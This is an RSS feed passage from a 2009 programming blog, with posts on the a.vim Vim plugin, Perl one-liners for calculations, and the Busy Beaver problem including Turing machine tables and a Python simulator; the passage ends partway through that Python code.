<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><!-- generator="wordpress/2.2.1" --><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>good coders code, great reuse</title>
	<link>http://www.catonmat.net</link>
	<description>Peteris Krumins' blog about programming, hacking, software reuse, software ideas, computer security, google and technology.</description>
	<pubDate>Tue, 10 Nov 2009 17:33:50 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.2.1</generator>
	<language>en</language>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/catonmat" type="application/rss+xml" /><feedburner:emailServiceId>catonmat</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com" /><item>
		<title>Vim Plugins You Should Know About, Part V: a.vim</title>
		<link>http://feedproxy.google.com/~r/catonmat/~3/aMUGJRZO6S0/</link>
		<comments>http://www.catonmat.net/blog/vim-plugins-a-vim/#comments</comments>
		<pubDate>Thu, 05 Nov 2009 14:45:15 +0000</pubDate>
		<dc:creator>Peteris Krumins</dc:creator>
		
		<category><![CDATA[Programming]]></category>
<category>a</category><category>alternate</category><category>mike sharpe</category><category>plugin</category><category>vim</category><category>vim plugin</category>
		<guid isPermaLink="false">http://www.catonmat.net/blog/vim-plugins-a-vim/</guid>
		<description><![CDATA[This is the fifth post in the article series &#8220;Vim Plugins You Should Know About&#8220;. This time I am going to introduce you to a nifty plugin called &#8220;a.vim&#8220;.
A.vim allows you to quickly switch between related source code files. For example, if you&#8217;re programming in C, you can alternate between source.c and the corresponding header [...]]]></description>
			<content:encoded><![CDATA[<p><img src='http://www.catonmat.net/blog/wp-content/uploads/2008/12/vim-plugins-surround-vim.gif' alt='Vim Plugins, surround.vim' class="post-icon" align="left" />This is the fifth post in the article series &#8220;<strong>Vim Plugins You Should Know About</strong>&#8220;. This time I am going to introduce you to a nifty plugin called &#8220;<strong>a.vim</strong>&#8220;.</p>
<p>A.vim allows you to quickly switch between related source code files. For example, if you&#8217;re programming in C, you can alternate between source.c and the corresponding header source.h by just typing <strong>:A</strong>.</p>
<p>It saves you only a few seconds every time you use it, but don&#8217;t forget that these seconds can add up to hours during several weeks.</p>
<p>This plugin was written by Mike Sharpe.</p>
<p>For the introduction of this article series see <a href="http://www.catonmat.net/blog/vim-plugins-surround-vim/">part one - surround.vim</a>.</p>
<h2 style="margin-bottom:10px">Other bindings in a.vim</h2>
<p>Besides the &#8221; <strong>:A</strong> &#8221; command that alternates between source files in the same buffer, a.vim also defines several other commands:</p>
<ul>
<li><strong>:AS</strong> &#8212; alternate in a horizontal split,</li>
<li><strong>:AV</strong> &#8212; alternate in a vertical split, and</li>
<li><strong>:AT</strong> &#8212; alternate in a new tab.</li>
</ul>
<p>The author of the plugin also defines the command &#8221; <strong>:IH</strong> &#8220;, which opens the file under cursor, but it&#8217;s really unnecessary because &#8220;<strong>gf</strong>&#8221; already does that.</p>
<h2 style="margin-bottom:10px">Extending a.vim</h2>
<p>By default a.vim defines alternation for the following languages:</p>
<ul>
<li>C &#8212; .c &lt;-> .h,</li>
<li>C++ &#8212; .c / .cpp / .cxx / .cc &lt;-> .h / .hpp,</li>
<li>lex and yacc &#8212; .l / .lex / .lpp &lt;-> .y / .ypp / .yacc,</li>
<li>ASP.NET &#8212; .aspx &lt;-> .aspx.cs / .aspx.vb</li>
</ul>
<p>The alternation can be extended to other extensions by defining the following variable in your .vimrc:</p>
<pre>
let g:alternateExtensions_foo = "bar,baz"
</pre>
<p>This will set up alternation between .foo, .bar and .baz files.</p>
<h2 style="margin-bottom:10px">How to install a.vim?</h2>
<p>To get the latest version:</p>
<ul>
<li>1. Download <a href="http://www.vim.org/scripts/script.php?script_id=31">a.vim</a>.</li>
<li>2. Put a.vim in ~/.vim (on Unix/Linux) or ~\vimfiles (on Windows).</li>
<li>3. Download alternate.txt from the same page.</li>
<li>4. Put alternate.txt in a.vim in ~/.vim/doc (on Unix/Linux) or ~/vimfiles/doc (on Windows).</li>
<li>5. Run :helptags ~/.vim/doc (on Unix/Linux) or :helptags ~/vimfiles/doc (on Windows) to rebuild the tags file (so that you can read :help alternate.)</li>
<li>6. Restart Vim.</li>
</ul>
<p>I have mapped the <strong>:A</strong> command to &#8221; <strong>,a</strong> &#8220;. You can also map it to the same combination by putting &#8220;map ,a :A&lt;CR&gt;&#8221; in your .vimrc file.</p>
<h2 style="margin-bottom:10px">Have Fun!</h2>
<p>Have fun with this plugin and until next time!</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/catonmat?a=aMUGJRZO6S0:mN8k0aFwyDg:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/catonmat?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=aMUGJRZO6S0:mN8k0aFwyDg:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/catonmat?i=aMUGJRZO6S0:mN8k0aFwyDg:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=aMUGJRZO6S0:mN8k0aFwyDg:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/catonmat?i=aMUGJRZO6S0:mN8k0aFwyDg:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=aMUGJRZO6S0:mN8k0aFwyDg:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/catonmat?i=aMUGJRZO6S0:mN8k0aFwyDg:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/catonmat/~4/aMUGJRZO6S0" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.catonmat.net/blog/vim-plugins-a-vim/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.catonmat.net/blog/vim-plugins-a-vim/</feedburner:origLink></item>
		<item>
		<title>Famous Perl One-Liners Explained, Part III: Calculations</title>
		<link>http://feedproxy.google.com/~r/catonmat/~3/KqbejYcmAtQ/</link>
		<comments>http://www.catonmat.net/blog/perl-one-liners-explained-part-three/#comments</comments>
		<pubDate>Tue, 03 Nov 2009 06:15:45 +0000</pubDate>
		<dc:creator>Peteris Krumins</dc:creator>
		
		<category><![CDATA[Programming]]></category>
<category>bignum</category><category>calculations</category><category>e</category><category>one liner</category><category>one liners</category><category>perl</category><category>perl1line.txt</category><category>pi</category>
		<guid isPermaLink="false">http://www.catonmat.net/blog/perl-one-liners-explained-part-three/</guid>
		<description><![CDATA[This is the third part of a seven-part article on famous Perl one-liners. In this part I will create various one-liners for calculations. See part one for introduction of the series.
Famous Perl one-liners is my attempt to create &#8220;perl1line.txt&#8221; that is similar to &#8220;awk1line.txt&#8221; and &#8220;sed1line.txt&#8221; that have been so popular among Awk and Sed [...]]]></description>
			<content:encoded><![CDATA[<p><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/02/perl-one-liners.jpg' alt='Perl One Liners' class='post-icon' align='left' />This is the third part of a seven-part article on <strong>famous Perl one-liners</strong>. In this part I will create various one-liners for <strong>calculations</strong>. See <a href="http://www.catonmat.net/blog/perl-one-liners-explained-part-one/">part one</a> for introduction of the series.</p>
<p>Famous Perl one-liners is my attempt to create &#8220;<strong>perl1line.txt</strong>&#8221; that is similar to &#8220;<a href="http://www.catonmat.net/blog/awk-one-liners-explained-part-one/">awk1line.txt</a>&#8221; and &#8220;<a href="http://www.catonmat.net/blog/sed-one-liners-explained-part-one/">sed1line.txt</a>&#8221; that have been so popular among Awk and Sed programmers.</p>
<p>The article on famous Perl one-liners will consist of at least seven parts:</p>
<ul>
<li><a href="http://www.catonmat.net/blog/perl-one-liners-explained-part-one/">Part I: File spacing</a>.</li>
<li><a href="http://www.catonmat.net/blog/perl-one-liners-explained-part-two/">Part II: Line numbering</a>.</li>
<li><strong>Part III: Calculations (this part)</strong>.</li>
<li>Part IV: String creation. Array creation.</li>
<li>Part V: Text conversion and substitution.</li>
<li>Part VI: Selective printing and deleting of certain lines.</li>
<li>Part VII: Release of perl1line.txt.</li>
</ul>
<p>After I&#8217;m done explaining all these one-liners, I&#8217;ll publish an ebook. Everyone who&#8217;s subscribed to my blog will get a free copy! <a href="http://www.catonmat.net/feed/">Subscribe now</a>!</p>
<p>The one-liners will make heavy use of Perl special variables. A few years ago I compiled all the Perl special variables in a single file and called it <a href="http://www.catonmat.net/blog/perls-special-variable-cheat-sheet/">Perl special variable cheat-sheet</a>. Even tho it&#8217;s mostly copied out of <a href="http://perldoc.perl.org/perlvar.html">perldoc perlvar</a>, it&#8217;s still handy to have in front of you, so print it.</p>
<p>And here are today&#8217;s one-liners:</p>
<h2 style="margin-bottom: 10px">Calculations</h2>
<p><strong>21. Check if a number is a prime.</strong></p>
<pre>perl -lne '(1x$_) !~ /^1?$|^(11+?)\1+$/ &#038;&#038; print "$_ is prime"'</pre>
<p>This one-liner uses an ingenious regular expression to detect if a given number is a prime or not. Don&#8217;t take it too seriously, though. I included it for its artistic value.</p>
<p>First, the number is converted in its unary representation by &#8221; (1x$_) &#8220;. For example, 5 gets converted into &#8221; 1&#215;5 &#8220;, which is &#8221; 11111 &#8220;.</p>
<p>Next, the unary number gets tested against the ingenious regular expression. If it <em>doesn&#8217;t match</em>, the number is a prime, otherwise it&#8217;s a composite.</p>
<p>The regular expression works this way. It consists of two parts &#8221; ^1?$ &#8221; and &#8221; ^(11+?)\1+$ &#8220;.</p>
<p>The first part matches &#8221; 1 &#8221; and empty string. Clearly, empty string and 1 are not prime numbers, therefore this regular expression matches, which indicated that they are not prime numbers.</p>
<p>The second part determines if two or more 1s repeatedly make up the whole number. If two or mores 1s repeatedly make up the whole number, the regex matches, which means that the number is composite. Otherwise it&#8217;s a prime.</p>
<p>Let&#8217;s look at the second regex part on numbers 5 and 6.</p>
<p>The number 5 in unary representation is &#8221; 11111 &#8220;. The &#8221; (11+?) &#8221; matches first two ones &#8221; 11 &#8220;. The back-reference &#8221; \1 &#8221; becomes &#8221; 11 &#8221; and the whole regex now becomes &#8221; ^11(11)+$ &#8220;. It can&#8217;t match five ones, therefore it fails. But since it used &#8221; +? &#8220;, it backtracks and matches the first three ones &#8221; 111 &#8220;. The back-reference becomes &#8221; 111 &#8221; and the whole regex becomes &#8221; ^111(111)+$ &#8220;. It doesn&#8217;t match again. This repeats for &#8221; 1111 &#8221; and &#8221; 11111 &#8220;, which also don&#8217;t match, therefore the whole regex doesn&#8217;t match and the number is a prime.</p>
<p>The number 4 in unary representation is &#8221; 1111 &#8220;. The &#8221; (11+?) &#8221; matches the first two ones &#8221; 11 &#8220;. The back-reference &#8221; \1 &#8221; becomes &#8221; 11 &#8221; and the regex becomes &#8221; ^11(11)+$ &#8220;. It matches the original string, therefore the number is not a prime.</p>
<p>The &#8221; -lne &#8221; command line options have been explained in parts <a href="http://www.catonmat.net/blog/perl-one-liners-explained-part-one/">one</a> and <a href="http://www.catonmat.net/blog/perl-one-liners-explained-part-two/">two</a>.</p>
<p><strong>22. Print the sum of all the fields on a line.</strong></p>
<pre>perl -MList::Util=sum -alne 'print sum @F'</pre>
<p>This one-liner turns on field auto-splitting with &#8221; -a &#8221; command line option and imports the &#8220;sum&#8221; function from &#8220;<a href="http://search.cpan.org/~gbarr/Scalar-List-Utils-1.21/lib/List/Util.pm">List::Util</a>&#8221; module with &#8221; -MList::Util=sum &#8221; option. The &#8220;List::Util&#8221; is in the Perl core so you don&#8217;t need to worry about installing it.</p>
<p>As a result of auto-splitting the split fields end up in the &#8221; @F &#8221; array and the &#8221; sum &#8221; function just sums them up.</p>
<p>The -Mmodule=arg option imports arg from module and is the same as writing:</p>
<pre>
use module qw(arg)
</pre>
<p>This one-liner is equivalent to the following:</p>
<pre>
use List::Util qw(sum);
while (<>) {
    @F = split(&#39; &#39;);
    print sum @F, &#34;\n&#34;;
}
</pre>
<p><strong>23. Print the sum of all the fields on all lines.</strong></p>
<pre>perl -MList::Util=sum -alne 'push @S,@F; END { print sum @S }'</pre>
<p>This one-liner keeps pushing the split fields in &#8221; @F &#8221; to the &#8221; @S &#8221; array. Once the input is over and perl is about quit, END { } block gets called that outputs the sum of all items in @F. This sum is the sum of all fields over all lines.</p>
<p>This solution isn&#8217;t too good - it creates a massive array @S. A better solution is to keep just the running:</p>
<pre>
perl -MList::Util=sum -alne '$s += sum @F; END { print $s }'
</pre>
<p><strong>24. Shuffle all fields on a line.</strong></p>
<pre>perl -MList::Util=shuffle -alne 'print "@{[shuffle @F]}"'</pre>
<p>This is almost the same as one-liner #22 above. Instead of summing all fields, it shuffles and prints them.</p>
<p>The &#8221; @{[shuffle @F]} &#8221; construct creates an array reference to the contents of &#8221; shuffle @F &#8221; and &#8221; @ { &#8230; } &#8221; dereferences it. This is a tricky way to execute code inside quotes. It was needed to get the values of shuffled @F separated by a space when printing them out.</p>
<p>Another way to do the same is join the elements of @F by a space, but it&#8217;s longer:</p>
<pre>perl -MList::Util=shuffle -alne 'print join " ", shuffle @F'</pre>
<p><strong>25. Find the minimum element on a line.</strong></p>
<pre>perl -MList::Util=min -alne 'print min @F'</pre>
<p>This one-liner uses the &#8220;min&#8221; function from &#8220;List::Util&#8221;. It&#8217;s similar to all the previous ones. After the line has been automatically split by &#8221; -a &#8220;, the &#8220;min&#8221; function finds minimum element and prints it.</p>
<p><strong>26. Find the minimum element over all the lines.</strong></p>
<pre>perl -MList::Util=min -alne '@M = (@M, @F); END { print min @M }'</pre>
<p>This one-liner is a combination of the previous one and the #23.</p>
<p>The &#8220;@M = (@M, @F)&#8221; construct is the same as &#8220;push @M, @F&#8221;. It appends the contents of @F to the array @M.</p>
<p>This one-liner stores all the data in memory. If you run it on a 10 terabyte file, it will die. Therefore it&#8217;s better to keep the running minimum element in memory and print it out at the end:</p>
<pre>
perl -MList::Util=min -alne '$min = min @F; $rmin = $min unless defined $rmin &#038;&#038; $min > $rmin; END { print $rmin }'
</pre>
<p>It finds the minimum of each line and stores in $min, then it checks if $min is smaller than the running minimum. Once the input ends, it prints the running minimum, which is the smallest value over all input.</p>
<p><strong>27. Find the maximum element on a line.</strong></p>
<pre>perl -MList::Util=max -alne 'print max @F'</pre>
<p>This is the same as #25, except &#8220;min&#8221; has been replaced with &#8220;max&#8221;.</p>
<p><strong>28. Find the maximum element over all the lines.</strong></p>
<pre>perl -MList::Util=max -alne '@M = (@M, @F); END { print max @M }'</pre>
<p>This is the same as #26.</p>
<p>Or:</p>
<pre>
perl -MList::Util=max -alne '$max = max @F; $rmax = $max unless defined $rmax &#038;&#038; $max < $rmax; END { print $rmax }'
</pre>
<p><strong>29. Replace each field with its absolute value.</strong></p>
<pre>perl -alne 'print "@{[map { abs } @F]}"'</pre>
<p>This one-liner auto-splits the line by &#8221; -a &#8221; command line option. The split fields, as I already explained, end up in the @F variable. Next it calls the absolute value function &#8220;abs&#8221; on each field by the help of &#8220;map&#8221; function. Finally it prints it joins all the fields by the help of array interpolation in double quotes.</p>
<p>The &#8221; @{ &#8230; } &#8221; construct was explained in one-liner #24.</p>
<p><strong>30. Find the total number of fields (words) on each line.</strong></p>
<pre>perl -alne 'print scalar @F'</pre>
<p>This one-liner forces to evaluate the @F in scalar context, which in Perl means &#8220;the number of elements in @F.&#8221; Therefore this one-liner prints out the number of elements on each line.</p>
<p><strong>31. Print the total number of fields (words) on each line followed by the line.</strong></p>
<pre>perl -alne 'print scalar @F, " $_"'</pre>
<p>This is exactly the same as #30, except &#8221; $_ &#8221; is added at the end that prints out the whole line. (Remember that &#8221; -n &#8221; option caused each line to be put in the $_ variable.)</p>
<p><strong>32. Find the total number of fields (words) on all lines.</strong></p>
<pre>perl -alne '$t += @F; END { print $t}'</pre>
<p>Here we just keep adding the number of fields on each line to variable &#8221; $t &#8220;, and at the end we print it out. The result is number of words on all lines.</p>
<p><strong>33. Print the total number of fields that match a pattern.</strong></p>
<pre>perl -alne 'map { /regex/ &#038;&#038; $t++ } @F; END { print $t}'</pre>
<p>This one-liner uses the &#8221; map &#8221; function that applies some operation on each of the elements in @F array. In this case the operation checks if each element matches /regex/ and if it does, it increments variable $t. At the end it prints this variable $t that contains the number of fields that matched /regex/ pattern.</p>
<p><strong>34. Print the total number of lines that match a pattern.</strong></p>
<pre>perl -lne '/regex/ &#038;&#038; $t++; END { print $t}'</pre>
<p>This one-liner uses the &#8221; map &#8221; function that applies some operation on each of the elements in @F array. In this case the operation checks if each element matches /regex/ and if it does, it increments variable $t. At the end it prints this variable $t that contains the number of fields that matched /regex/ pattern.</p>
<p><strong>35. Print the number PI to n decimal places.</strong></p>
<pre>perl -Mbignum=bpi -le 'print bpi(21)'</pre>
<p>The <a href="http://search.cpan.org/~tels/bignum-0.23/lib/bignum.pm">bignum</a> package exports <strong>bpi</strong> function that calculates constant PI to wanted accuracy. This one-liner prints PI to 20 decimal places.</p>
<p>The bignum library also exports constant PI alone to 39 decimal places:</p>
<pre>perl -Mbignum=PI -le 'print PI'</pre>
<p><strong>36. Print the number E to n decimal places.</strong></p>
<pre>perl -Mbignum=bexp -le 'print bexp(1,21)'</pre>
<p>The bignum library also exports bexp function that takes two arguments - the power to raise e to and accuracy. This one-liner prints the constant e to 20 decimal places.</p>
<p>You can print the value of e^2 to 30 decimal places this way:</p>
<pre>perl -Mbignum=bexp -le 'print bexp(2,31)'</pre>
<p>Just the same as with PI, bignum exports the constant e alone to 39 decimal places:</p>
<pre>perl -Mbignum=e -le 'print e'</pre>
<p><strong>more calculations one-liners coming soon.</strong></p>
<p>I got tired writing at this moment. I will add a new one-liner every other day here. Things like power-sets, ip calculations, date calculations and others.</p>
<p><strong>update:</strong> 2009.11.07 added printing PI and E (one liners 35 and 36).</p>
<h2 style="margin-bottom: 10px">Have Fun!</h2>
<p>Have fun with these one-liners for now. The next part is going to be about string and array creation.</p>
<p><strong>Can you think of other calculations that I did not include here?</strong></p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/catonmat?a=KqbejYcmAtQ:7pJTTvqR5pY:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/catonmat?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=KqbejYcmAtQ:7pJTTvqR5pY:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/catonmat?i=KqbejYcmAtQ:7pJTTvqR5pY:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=KqbejYcmAtQ:7pJTTvqR5pY:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/catonmat?i=KqbejYcmAtQ:7pJTTvqR5pY:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=KqbejYcmAtQ:7pJTTvqR5pY:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/catonmat?i=KqbejYcmAtQ:7pJTTvqR5pY:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/catonmat/~4/KqbejYcmAtQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.catonmat.net/blog/perl-one-liners-explained-part-three/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.catonmat.net/blog/perl-one-liners-explained-part-three/</feedburner:origLink></item>
		<item>
		<title>The Busy Beaver Problem</title>
		<link>http://feedproxy.google.com/~r/catonmat/~3/OOwhMbyanxE/</link>
		<comments>http://www.catonmat.net/blog/busy-beaver/#comments</comments>
		<pubDate>Thu, 29 Oct 2009 05:30:49 +0000</pubDate>
		<dc:creator>Peteris Krumins</dc:creator>
		
		<category><![CDATA[Computer Science]]></category>
<category>atoms</category><category>busy beaver</category><category>computability theory</category><category>cpp</category><category>gd</category><category>libgd</category><category>perl</category><category>python</category><category>state</category><category>tape</category><category>the new turing omnibus</category><category>turing machine</category><category>universe</category><category>visualization</category>
		<guid isPermaLink="false">http://www.catonmat.net/blog/busy-beaver/</guid>
		<description><![CDATA[

Busy Beaver puts another one on the Turing Machine&#8217;s tape.
(image from a book &#8220;the new turing omnibus&#8220;)


The busy beaver problem is a fun theoretical computer science problem to know. Intuitively, the problem is to find the smallest program that outputs as many data as possible and eventually halts. More formally it goes like this &#8212; [...]]]></description>
			<content:encoded><![CDATA[<div class="center-aligner">
<img src='http://www.catonmat.net/blog/wp-content/uploads/2009/10/busy-beaver-turing-machine.jpg' alt='Busy beaver putting ones on a Turing Machine’s tape' /><br />
<small><strong>Busy Beaver puts another one on the Turing Machine&#8217;s tape.</strong></small><br />
<small>(image from a book &#8220;<a href="http://www.amazon.com/dp/0805071660?tag=catonmat-20">the new turing omnibus</a>&#8220;)</small>
</div>
<div style="margin-bottom: 10px"></div>
<p><strong>The busy beaver problem</strong> is a fun theoretical computer science problem to know. Intuitively, the problem is to find the smallest program that outputs as many data as possible and eventually halts. More formally it goes like this &#8212; given an n-state <a href="http://en.wikipedia.org/wiki/Turing_machine">Turing Machine</a> with a two symbol alphabet {0, 1}, what is the maximum number of 1s that the machine may print on an initially blank tape (0-filled) before halting?</p>
<p>It turns out that this problem can&#8217;t be solved. For a small number of states it can be reasoned about, but it can&#8217;t be solved in general. Theorists call such problems non-computable.</p>
<p>Currently people have managed to solve it for n=1,2,3,4 (for Turing Machines with 1, 2, 3 and 4 states) by reasoning about and running all the possible Turing Machines, but for n ≥ 5 this task has currently been impossible. While most likely it will be solved for n=5, theorists doubt that it shall ever be computed for n=6.</p>
<p>Let&#8217;s denote the number of 1s that the busy beaver puts on a tape after halting as S(n) and call it <strong>the busy beaver function</strong> (this is the solution to the busy beaver problem). The busy beaver function is also interesting &#8212; it grows faster than any computable function. It grows like this:</p>
<ul>
<li>S(1) = 1</li>
<li>S(2) = 4</li>
<li>S(3) = 6</li>
<li>S(4) = 13</li>
<li>S(5) ≥ 4098 (the exact result has not yet been found)</li>
<li>S(6) ≥ 4.6 · 10<sup>1439</sup> (the exact result shall never be known)</li>
</ul>
<p>If we were to use one atom for each 1 that the busy beaver puts on the tape, at n=6 we would have filled the whole universe! That&#8217;s how fast the busy beaver function is growing.</p>
<p>I decided to play with the busy beaver myself to verify the known results for n ≤ 5. I implemented a Turing Machine in Python, which turned out to be too slow, so I reimplemented it in C++ (source code of both implementations below).</p>
<p>I also wrote a visualization tool in Perl that shows how the Turing Machine&#8217;s tape changes from the start to the finish (source code also below).</p>
<p>I used the following best known Turing Machines. Their tapes are initially filled with 0&#8217;s, their starting state is &#8221; a &#8221; and halting state is &#8221; h &#8220;. The notation &#8221; a0 -> b1l &#8221; means &#8220;if we are in the state &#8220;a&#8221; and the current symbol on the tape is &#8220;0&#8243; then put a &#8220;1&#8243; in that cell, switch to state &#8220;b&#8221; and move to left &#8220;l&#8221;. This process repeats until the machine ends up in the halting state.</p>
<p>Turing Machine for 1-state Busy Beaver:</p>
<pre>
a0 -> h1r
</pre>
<p>Turing Machine for 2-state Busy Beaver:</p>
<pre>
a0 -> b1r    a1 -> b1l
b0 -> a1l    b1 -> h1r
</pre>
<p>Here is how the trace of tape changes look like for the 2-state busy beaver:</p>
<div class="center-aligner">
<img src='http://www.catonmat.net/blog/wp-content/uploads/2009/10/busy-beaver-two-states.png' alt='Two State Busy Beaver' /><br />
<small>Tape changes for 2 state busy beaver.</small>
</div>
<p>Turing Machine for 3-state Busy Beaver:</p>
<pre>
a0 -> b1r    a1 -> h1r
b0 -> c0r    b1 -> b1r
c0 -> c1l    c1 -> a1l
</pre>
<div class="center-aligner">
<img src='http://www.catonmat.net/blog/wp-content/uploads/2009/10/busy-beaver-three-states.png' alt='Two State Busy Beaver' /><br />
<small>Tape changes for 3 state busy beaver.</small>
</div>
<p>Turing Machine for 4-state Busy Beaver:</p>
<pre>
a0 -> b1r    a1 -> b1l
b0 -> a1l    b1 -> c0l
c0 -> h1r    c1 -> d1l
d0 -> d1r    d1 -> a0r
</pre>
<div class="center-aligner">
<img src='http://www.catonmat.net/blog/wp-content/uploads/2009/10/busy-beaver-four-states.png' alt='Two State Busy Beaver' /><br />
<small>Tape changes for 4 state busy beaver.</small>
</div>
<p>Turing Machine for 5-state Busy Beaver:</p>
<pre>
a0 -> b1l    a1 -> a1l
b0 -> c1r    b1 -> b1r
c0 -> a1l    c1 -> d1r
d0 -> a1l    d1 -> e1r
e0 -> h1r    e1 -> c0r
</pre>
<p>This image is huge (6146 x 14293 pixels, but only 110KB in size). Click for full size.</p>
<div class="center-aligner">
<a href="http://www.catonmat.net/blog/wp-content/uploads/2009/10/busy-beaver-five-states.png"><br />
<img src='http://www.catonmat.net/blog/wp-content/uploads/2009/10/busy-beaver-five-states-thumbnail.png' alt='Two State Busy Beaver' /><br />
</a><br />
<small>Tape changes for 5 state busy beaver.</small>
</div>
<p>Turing Machine for 6 state Busy Beaver:</p>
<pre>
a0 -> b1r    a1 -> e0l
b0 -> c1l    b1 -> a0r
c0 -> d1l    c1 -> c0r
d0 -> e1l    d1 -> f0l
e0 -> a1l    e1 -> c1l
f0 -> e1l    f1 -> h1r
</pre>
<p>Here is my Python program to simulate all these Turing Machines. But as I said, it turned out to be too slow. For the 5 state Busy Beaver it took 5 minutes to generate the currently best known solution.</p>
<p>Download: <a href="http://www.catonmat.net/download/busy_beaver.py">busy_beaver.py</a> (140)</p>
<pre class="lotsocode">
#!/usr/bin/python
#
# Turing Machine simulator for Busy Beaver problem.
# Version 1.0
#

import sys

class Error(Exception):
    pass

class TuringMachine(object):
    def __init__(self, program, start, halt, init):
        self.program = program
        self.start = start
        self.halt = halt
        self.init = init
        self.tape = [self.init]
        self.pos = 0
        self.state = self.start
        self.set_tape_callback(None)
        self.tape_changed = 1
        self.movez = 0

    def run(self):
        tape_callback = self.get_tape_callback()
        while self.state != self.halt:
            if tape_callback:
                tape_callback(self.tape, self.tape_changed)

            lhs = self.get_lhs()
            rhs = self.get_rhs(lhs)

            new_state, new_symbol, move = rhs

            old_symbol = lhs[1]
            self.update_tape(old_symbol, new_symbol)
            self.update_state(new_state)
            self.move_head(move)

        if tape_callback:
            tape_callback(self.tape, self.tape_changed)

    def set_tape_callback(self, fn):
        self.tape_callback = fn

    def get_tape_callback(self):
        return self.tape_callback

    property(get_tape_callback, set_tape_callback)

    @property
    def moves(self):
        return self.movez

    def update_tape(self, old_symbol, new_symbol):
        if old_symbol != new_symbol:
            self.tape[self.pos] = new_symbol
            self.tape_changed += 1
        else:
            self.tape_changed = 0

    def update_state(self, state):
        self.state = state

    def get_lhs(self):
        under_cursor = self.tape[self.pos]
        lhs = self.state + under_cursor
        return lhs

    def get_rhs(self, lhs):
        if lhs not in self.program:
            raise Error(&#39;Could not find transition for state &#34;%s&#34;.&#39; % lhs)
        return self.program[lhs]

    def move_head(self, move):
        if move == &#39;l&#39;:
            self.pos -= 1
        elif move == &#39;r&#39;:
            self.pos += 1
        else:
            raise Error(&#39;Unknown move &#34;%s&#34;. It can only be left or right.&#39; % move)

        if self.pos &lt; 0:
            self.tape.insert(0, self.init)
            self.pos = 0
        if self.pos &gt;= len(self.tape):
            self.tape.append(self.init)

        self.movez += 1

beaver_programs = [
    { },

    {&#39;a0&#39;: &#39;h1r&#39; },

    {&#39;a0&#39;: &#39;b1r&#39;, &#39;a1&#39;: &#39;b1l&#39;,
     &#39;b0&#39;: &#39;a1l&#39;, &#39;b1&#39;: &#39;h1r&#39;},

    {&#39;a0&#39;: &#39;b1r&#39;, &#39;a1&#39;: &#39;h1r&#39;,
     &#39;b0&#39;: &#39;c0r&#39;, &#39;b1&#39;: &#39;b1r&#39;,
     &#39;c0&#39;: &#39;c1l&#39;, &#39;c1&#39;: &#39;a1l&#39;},

    {&#39;a0&#39;: &#39;b1r&#39;, &#39;a1&#39;: &#39;b1l&#39;,
     &#39;b0&#39;: &#39;a1l&#39;, &#39;b1&#39;: &#39;c0l&#39;,
     &#39;c0&#39;: &#39;h1r&#39;, &#39;c1&#39;: &#39;d1l&#39;,
     &#39;d0&#39;: &#39;d1r&#39;, &#39;d1&#39;: &#39;a0r&#39;},

    {&#39;a0&#39;: &#39;b1l&#39;, &#39;a1&#39;: &#39;a1l&#39;,
     &#39;b0&#39;: &#39;c1r&#39;, &#39;b1&#39;: &#39;b1r&#39;,
     &#39;c0&#39;: &#39;a1l&#39;, &#39;c1&#39;: &#39;d1r&#39;,
     &#39;d0&#39;: &#39;a1l&#39;, &#39;d1&#39;: &#39;e1r&#39;,
     &#39;e0&#39;: &#39;h1r&#39;, &#39;e1&#39;: &#39;c0r&#39;},

    {&#39;a0&#39;: &#39;b1r&#39;, &#39;a1&#39;: &#39;e0l&#39;,
     &#39;b0&#39;: &#39;c1l&#39;, &#39;b1&#39;: &#39;a0r&#39;,
     &#39;c0&#39;: &#39;d1l&#39;, &#39;c1&#39;: &#39;c0r&#39;,
     &#39;d0&#39;: &#39;e1l&#39;, &#39;d1&#39;: &#39;f0l&#39;,
     &#39;e0&#39;: &#39;a1l&#39;, &#39;e1&#39;: &#39;c1l&#39;,
     &#39;f0&#39;: &#39;e1l&#39;, &#39;f1&#39;: &#39;h1r&#39;}
]

def busy_beaver(n):
    def tape_callback(tape, tape_changed):
        if tape_changed:
            print &#39;&#39;.join(tape)

    program = beaver_programs[n]

    print &#34;Running Busy Beaver with %d states.&#34; % n
